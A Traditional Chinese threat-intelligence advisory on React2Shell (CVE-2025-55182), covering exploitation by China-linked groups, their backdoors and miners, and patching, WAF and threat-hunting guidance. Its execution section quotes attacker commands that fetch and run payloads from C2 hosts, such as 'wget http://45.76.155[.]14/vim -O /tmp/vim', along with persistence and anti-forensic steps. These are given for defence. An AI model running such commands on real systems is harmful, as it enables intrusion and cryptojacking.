【精選威脅情資】React2Shell 漏洞濫用：中國駭客組織協同攻擊下的全球災情分析

‍

危害與影響

React2Shell (CVE-2025-55182) 是一個在 RSC (React Server Components) 上的 RCE 漏洞，此漏洞威脅在於攻擊前無需通過身分驗證。攻擊者只需發送單一 HTTP 請求，就能以網頁伺服器使用者的身分執行任意程式碼。由於 Next.js 等熱門框架均內嵌這些套件，影響範圍極廣，且利用門檻很低。在許多部署環境中，只要系統套件存在漏洞，就足以讓駭客入侵。

‍

分析師觀點

React2Shell 讓多個駭客組織得以在全球快速利用漏洞，攻擊大量 React/Next.js 工作負載。此漏洞影響範圍甚廣，從建立隱密的持久存取權，到造成實質的營運與成本後果，這在雲端與 VPS 託管環境中尤為嚴重。

‍

描述

React2Shell 漏洞於 2025 年 12 月 3 日公開後，僅數日便遭各方大規模利用。Google 威脅情資團隊觀察到，多個與中國有關的駭客組織採取協同行動，另有以獲利為目的的駭客與伊朗相關組織發起攻擊。最活躍的駭客組織部署了混合型的通道程式 (tunnelers)、後門程式 (backdoors) 與挖礦程式 (miners)：

• UNC6600： 使用 MINOCAT 通道程式（內嵌 FRP）建立秘密存取管道並維持長期潛伏。
• UNC6586： 使用 SNOWLIGHT 下載器（VSHELL 元件）從外部 C2 下載更多惡意酬載。
• UNC6588： 使用 COMPOOD 後門程式，將其偽裝成無害的二進位檔案。
• UNC6603： 使用更新版的 HISONIC 後門程式，將設定檔流量藏匿於合法的雲端服務中，主要鎖定亞太地區的 AWS 與阿里雲 (Alibaba Cloud) 工作負載。
• UNC6595： 使用 ANGRYREBEL.LINUX，將其偽裝成 sshd，並在 VPS 基礎設施上使用反鑑識技術。

另有報告指出 EarthLamia (UNC5454) 與 Jackpot Panda 也利用了此漏洞，亦有其他犯罪軟體集團大規模部署 XMRig 挖礦程式。

主要影響範圍包含：

• 暴露於網際網路的 React 與 Next.js 應用程式，即使漏洞套件僅以傳遞依賴 (TransitiveDependencies) 形式存在，仍具風險。
• 負載平衡器與進入點的邊緣 /WAF 防護效能。
• 攻擊者常竄改主機持續性機制（systemd 服務、cron 排程）與使用者 Shell 初始檔案 (.bashrc)，以維持長久存取。
• 漏洞遭利用後，系統會立即發起連線以擷取惡意酬載並建立 C2 通道，故監控異常外連至關重要。

‍

技術分析‍

根本原因  (Root cause)

• 漏洞類別：ReactServer Components 中未經身分驗證的 RCE。
• 受影響套件/版本：react-server-dom-webpack、react-server-dom-parcel、react-server-dom-turbopack 的 19.0、19.1.0、19.1.1、19.2.0版本。
• 漏洞利用特徵：單個HTTP 請求即可在網頁伺服器程式 (process) 的情境下觸發任意程式碼執行。即使有漏洞的套件僅是作為傳遞依賴項目存在，攻擊者仍可利用。攻擊者可使用多種有效的酬載編碼方式，包括記憶體內的 Next.js Web Shell。

偵查 (Reconnaissance)

• 實施自動化全網掃描，藉以識別含有漏洞 RSC 套件的應用程式與可利用的 Next.js 端點。
• 入侵後迅速從立足點進行指紋識別，了解作業系統、服務與權限。
• 進行基本的環境勘查，以驗證實際權限等級、列舉網路介面、DNS 設定以及潛在的敏感憑證儲存區。

資源開發(Resource Development)

• 建立並重複使用 C2/中繼站基礎設施：
  
  • 使用 reactcdn.windowserrorapis[.]com 透過 HTTPS 存放 SNOWLIGHT/VSHELL。
  • 直接託管於 45.76.155[.]14 供 COMPOOD 使用（路徑為 “/vim”）。
• 濫用合法平台以混淆流量並存放設定檔：
  
  • HISONIC 利用 Cloudflare Pages 與 GitLab 存放加密過的設定檔。
• 封裝攻擊能力：
  
  • MINOCAT 整合了客製化的 NSS wrapper 並內嵌 FRP (Fast Reverse Proxy) 客戶端。
• 工具交換：
  
  • 於地下論壇分享掃描器 /PoC程式碼。
  • 利用 GitHub 散布挖礦程式與部分漏洞利用程式碼，其中混雜了造假或無效的儲存庫與針對研究人員的樣本。

初始存取 (Initial Access)

• 管道：針對面向公眾的 React/Next.js 應用程式發送單個未經身分驗證的 HTTP 請求，利用 CVE-2025-55182 漏洞。
• 結果：取得與網頁伺服器程式相同的權限執行程式碼，並能立即執行後續指令。

執行 (Execution)

常見執行路徑：網頁伺服器程式呼叫 curl 或 wget 擷取 bash 腳本與 ELF 二進位檔，隨後執行這些檔案。

• 觀察到的代表性攻擊鏈與指令：
  
  • MINOCAT (UNC6600)：Bash 安裝程式建立 $HOME/.systemd-utils，終止名為 ntpclient 的程式，下載 MINOCAT ELF 檔並啟動之。
  • SNOWLIGHT/VSHELL (UNC6586)：curl/wget 擷取腳本，該腳本下載並執行 SNOWLIGHT，接著 SNOWLIGHT 發送 HTTPSGET 請求取得分段酬載： curl -fsSL -m180
    reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true-o <filename>
  • COMPOOD (UNC6588)： wget http://45.76.155[.]14/vim -O /tmp/vim，執行時偽裝成 Vim： /tmp/vim"/usr/lib/polkit-1/polkitd --no-debug"
  • HISONIC (UNC6603)：部署 Go 語言撰寫的後門程式，從合法服務擷取加密設定。
  • ANGRYREBEL.LINUX (UNC6595)：透過 b.sh 安裝，偽裝成 sshd 在非標準的 /etc 位置執行。
  • XMRig (獲利動機)： sex.sh 從 GitHub 拉取挖礦程式並啟動，新增 systemd 單元以維持運作。

持續性（Persistence）

• Cron：新增排程任務以自動啟動酬載（例如 MINOCAT）。
• systemd：建立服務單元以自動啟動並確保服務韌性（例如 MINOCAT 服務、XMRig 使用的 “system-update-service”）。
• Shell RC 注入：將惡意指令區塊插入使用者 Shell 設定檔（例如~/.bashrc），以便在新工作階段時重新啟動酬載。

權限提升 (Privilege Escalation)

服務/Daemon 濫用與偽裝：

• 以系統服務 (systemd) 身分或類似方式執行惡意軟體，以便在設定錯誤的情況下繼承提升的權限。
• COMPOOD 執行時帶有類似 polkitd 的參數，ANGRYREBEL.LINUX在 /etc 下偽裝成 sshd 以混入特權 Daemon 中。

防禦規避（DefenseEvasion）

• 檔案與程式偽裝：
  
  • MINOCAT 建立隱藏目錄：$HOME/.systemd-utils。
  • COMPOOD 命名並放置於看似 Vim 的位置，ANGRYREBEL.LINUX 在非標準路徑下顯示為 sshd。
• 反鑑識：
  
  • 竄改檔案時間戳記 (Timestomping)，清除 Shell 歷史紀錄 (history -c)。
  • 終止 ntpclient 以消除蹤跡或干擾監控。
• 流量與設定混淆：
  
  • HISONIC 擷取託管於 Cloudflare Pages/GitLab 的 XOR 編碼設定，設定檔由標記 115e1fc47977812 … 725166234cf88gxx 區隔。
  • SNOWLIGHT 透過 HTTPS 擷取分段酬載，並偽裝成合法檔案。
• 看似無害的持續性機制：
  
  • 使用欺騙性的服務名稱（例如用於加密貨幣挖礦的 “system-update-service”）。

橫向移動 (Lateral Movement)

• 反向通道：
  
  • MINOCAT 內嵌 FRP 客戶端，建立連回攻擊者基礎設施的反向通道，藉此進行跳轉並存取內部資產。
• 部署後門以利跨主機存取：
  
  • SNOWLIGHT/VSHELL、COMPOOD 與 HISONIC 提供遠端任務指派與 C2 回連功能。
  • ANGRYREBEL.LINUX 偽裝成 sshd，支援跨主機的隱密 SSH 入侵。

命令與控制（Commandand Control）

• 基於 HTTP(S) 的C2：
  
  • SNOWLIGHT/VSHELL 發送帶有參數的 GET 請求至 reactcdn.windowserrorapis[.]com:443（例如 t=tcp, a=l64, stage=true）以拉取分段酬載。
• 混入雲端服務：
  
  • HISONIC 從 Cloudflare Pages 與 GitLab 擷取加密設定，使流量看似無害。
• 其他後門：
  
  • COMPOOD 具備 C2 能力（互動式 Shell、PTY、HTTP/TCP、SOCKSproxy），但在部分案例中觀察到的後續 C2 活動有限。

惡意軟體特徵與值得注意的指標 (Malware traits andnotable indicators)

衝擊 (Impact)

• 資源劫持：透過 sex.sh 部署 XMRig 進行非法加密貨幣挖礦，並以偽造的 “system-update-service” systemd 單元維持運作。
• 服務操弄：安裝 MINOCAT 期間終止 ntpclient 程式。
• 對企業的意義：
  
  • 鎖定範圍廣且武器化迅速：漏洞公開後，攻擊幾乎隨即展開，包含間諜活動與獲利為主。PoC 公開後，雖然包含部分造假或設有陷阱的儲存庫，但也加速了漏洞利用的普及率，對研究人員造成挑戰。
  • 雲端與面向網際網路的風險集中： 我們觀察到，面向網際網路的 React/Next.js 應用程式承受最大壓力，特別是雲端託管的工作負載（AWS、阿里雲）與國際 VPS 環境。若容器與自行託管的部署環境包含有漏洞的 RSC 套件，也同樣暴露於風險中。
• 入侵後果：
  
  • 透過通道程式或後門程式 (MINOCAT、HISONIC、COMPOOD、SNOWLIGHT)取得秘密存取權與指揮控制 (C2) 能力，利用 cron/systemd 與劫持 shell 初始程式維持存取權，以及偽裝成系統執行檔。
  • 透過挖礦程式 (XMRig) 劫持資源並導致服務降級，可能影響效能並使雲端費用激增。
  • 運用反鑑識技術（清除歷史紀錄、竄改時間戳記）增加維運風險，導致事件應變與範圍界定更加困難。
  • 雖然目前的報告尚未廣泛證實資料外洩的跡象，但由於後門存取權相當持久，資料遭竊與後續入侵的潛在風險仍不容小覷。
• 產業衝擊：受害者橫跨多個領域，目前的遙測數據與公開報告顯示，金融、零售、物流、IT/科技、教育及政府部門皆受波及，且攻擊重點明顯在於雲端託管的網頁基礎設施，而非單一特定垂直產業。
• 受害足跡：影響遍及全球，但集中於亞太地區的雲端環境。部分惡意酬載（如 COMPOOD）的歷史軌跡顯示，其活動範圍包含台灣、越南與中國。
• 戰略意涵：
  
  • 高嚴重性且低門檻的路徑：由於 CVSS 評分達 10.0 (v3.x)，攻擊者只需發送單個 HTTP 請求即可入侵，React2Shell 已成為國家級駭客與犯罪份子首選的初始入侵管道。
  • 漏洞攻擊面擴大：繼 CVE‑2025‑55182 之後，React 又陸續出現其他問題（CVE‑2025‑55183 資訊洩漏、CVE‑2025‑55184 與 CVE‑2025‑67779 阻斷服務），這表示近期將進入高度審查期，攻擊者也會持續關注。
  • 供應鏈與依賴項目的盲點：許多組織發現有漏洞的 RSC 套件是以傳遞依賴項目 (Transitive Dependencies) 的形式存在，導致單體式儲存庫 (Monorepos)、容器與 CI/CD 產出物在不知情下，面臨極高的風險。

結論

React2Shell 引發了後續一系列漏洞的揭露，這象徵著該技術正處於高風險期。即便其中兩個漏洞屬於 DoS/資訊洩漏、僅影響可用性或資訊安全，它們的存在代表應升高審查層級，企業也需藉由快速迭代修補來防範不斷升高的維運風險。

‍‍

緩解措施

以修補程式為主要控制手段 (Patch as the primarycontrol)

• 立即升級有漏洞的 RSC 套件，包含 react-server-dom-webpack、react-server-dom-parcel、react-server-dom-turbopack 的 19.0、19.1.0、19.1.1 或 19.2.0 版本。
• 修補 RCE 的最低修正版本： 19.0.1、19.1.2 或 19.2.1 版本，19.2.2 與 19.2.3 版本是相對安全的。
• 相關後續修正：
  
  • CVE-2025-55183（資訊洩漏）：19.2.2 版本
  • CVE-2025-55184 與 CVE-2025-67779 (DoS)：19.2.3 版本（19.2.2 的 DoS 防護不完整）
• 建議：將 19.2.3 版本視為全環境派送的首選目標，以解決 RCE 與後續問題。
• 範圍與清查：即使未啟用該功能，只要系統中存在受影響的 RSC 套件，仍具備被利用之風險。請全面稽核 React/Next.js 以及任何綑綁該套件的應用程式。稽核範圍應涵蓋原始碼儲存庫、容器及現有運行中的映像檔。

利用邊緣端執行虛擬修補 (Temporary virtualpatching at the edge)

• 請即刻部署 WAF 規則以攔截 React2Shell 攻擊嘗試。若使用 Google Cloud Armor，可直接套用官方發布的代管規則。在您修補並驗證所有執行個體的同時，請於面向網際網路的負載平衡器上啟用此規則。
• 由於酬載格式多樣且攻擊技術演變迅速，請視 WAF 為權宜之計，而非修補的替代方案。

針對性的偵測、威脅獵捕與圍堵 (Targeted detection, hunting, and containment)

由於漏洞利用情況普遍，且入侵後通常數分鐘內便會展開後續行動，因此請假設未修補的系統已遭入侵，並針對下列項目進行威脅獵捕：

• 程式與網路指標
  
  • 網頁伺服器程式衍生出 curl 或 wget 以擷取並執行酬載。
  • 連線至已觀察到的 C2/託管站點的出站連線：
    
    • reactcdn.windowserrorapis[.]com，且帶有類似 &t=tcp&a=…&stage=true 的查詢模式 (SNOWLIGHT/VSHELL)。
    • 45.76.155[.]14/vim (COMPOOD)。
  • 出現類似 FRP 的通道行為 (MINOCAT) 或植入物，從 Cloudflare Pages 或 GitLab 拉取設定 (HISONIC) 的跡象。
• 持續性與本機變更
  
  • 建立隱藏目錄：$HOME/.systemd-utils。
  • 新增或經修改的持續性機制：利用 Cron 工作、偽裝的 systemd 服務（例如用於 XMRig 的 “system-update-service”、MINOCAT 服務）以及在 $HOME/.bashrc 與其他 rc 檔案的 Shell 初始設定中注入指令。
  • 異常的程式動作：終止 ntpclient。
  • 偽裝或反鑑識：二進位檔案位於非典型路徑（例如 COMPOOD 位於 /tmp/vim、假 sshd 位於 /etc 下）、時間戳記竄改以及清除 Shell 歷史紀錄 (history -c)。
• 特定惡意軟體獵捕
  
  • 使用提供的 YARA 規則/IOCs 掃描磁碟與記憶體中的 MINOCAT、COMPOOD 與 SNOWLIGHT。
  • 尋找 HISONIC 設定標記：115e1fc47977812 … 725166234cf88gxx。
• 發現時的圍堵或根除機制
  
  • 隔離主機、終止惡意程式、移除惡意 Cron 項目與 systemd 單元、還原 Shell 初始檔案、刪除分段二進位檔與隱藏目錄、在出口端封鎖觀察到的 C2、從已知的良好映像檔重建系統、輪替主機上或應用程式使用的憑證。

強化曝險管理與抑制連鎖反應 (Strengthen exposureand blast‑radius controls)

• 盡量減少應用程式伺服器的對外連線，使單一 HTTP 攻擊無法自由擷取酬載或連線至 C2。
• 強制實施最小權限的出站規則與 Proxy 白名單。
• 以非特權帳號執行網頁服務、限制對系統目錄與 Shell 初始檔案的寫入權限、監控從暫存或非標準路徑（/tmp、/etc 下的異常二進位檔）執行的行為。
• 確保保留網頁存取、程式執行與出站連線的 Log，並可集中搜尋以支援快速的範圍界定。

應變檢核表 (Immediate action checklist)

• 立即啟用代管的 WAF 規則。
• 盤點並修補所有受影響的應用程式至修正版本，建議全場域優先升級至 19.2.3 版本。
• 依據上述指標獵捕入侵跡象，發現時進行圍堵與根除。
• 強化出站與主機加固控制，確保 Log 記錄與警報涵蓋上述行為。

‍參考資料

• Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
• China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
• Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
• CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation
• Detecting React2Shell: The maximum-severity RCE vulnerability affecting React Server Components and Next.js

‍

入侵指標 (Indicator of Compromise, IoCs)

IP/Domain

Files